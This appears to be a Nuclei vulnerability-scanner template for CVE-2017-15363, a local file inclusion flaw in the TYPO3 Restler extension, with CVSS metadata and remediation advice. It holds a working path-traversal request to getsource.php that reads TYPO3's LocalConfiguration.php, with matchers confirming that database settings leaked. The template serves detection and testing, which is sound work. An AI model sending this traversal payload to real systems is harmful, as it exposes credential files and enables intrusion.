52 lines
1.7 KiB
YAML
52 lines
1.7 KiB
YAML
id: CVE-2017-15363
|
|
|
|
info:
|
|
name: Luracast Restler 3.0.1 via TYPO3 Restler 1.7.1 - Local File Inclusion
|
|
author: 0x_Akoko
|
|
severity: high
|
|
description: Luracast Restler 3.0.1 via TYPO3 Restler 1.7.1 is susceptible to local file inclusion in public/examples/resources/getsource.php. This could allow remote attackers to read arbitrary files via the file parameter.
|
|
remediation: |
|
|
Update to the latest version of Restler and TYPO3 to fix the vulnerability.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/42985
|
|
- https://extensions.typo3.org/extension/restler/
|
|
- https://extensions.typo3.org/extension/download/restler/1.7.1/zip/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-15363
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2017-15363
|
|
cwe-id: CWE-22
|
|
epss-score: 0.04393
|
|
epss-percentile: 0.91437
|
|
cpe: cpe:2.3:a:luracast:restler:*:*:*:*:*:typo3:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: luracast
|
|
product: restler
|
|
framework: typo3
|
|
tags: cve,cve2017,restler,lfi,edb
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "<?php"
|
|
- "'host'"
|
|
- "'database'"
|
|
- "'extConf'"
|
|
- "'debug'"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4b0a00483046022100f452e1f5dba423715f8d4339c80841901a15f4fd5b75d175ab5ca330810db0af02210087423b61fff1298790852768262b3c86e31137a301daac2901a153ada62be965:922c64590222798bb761d5b6d8e72950
|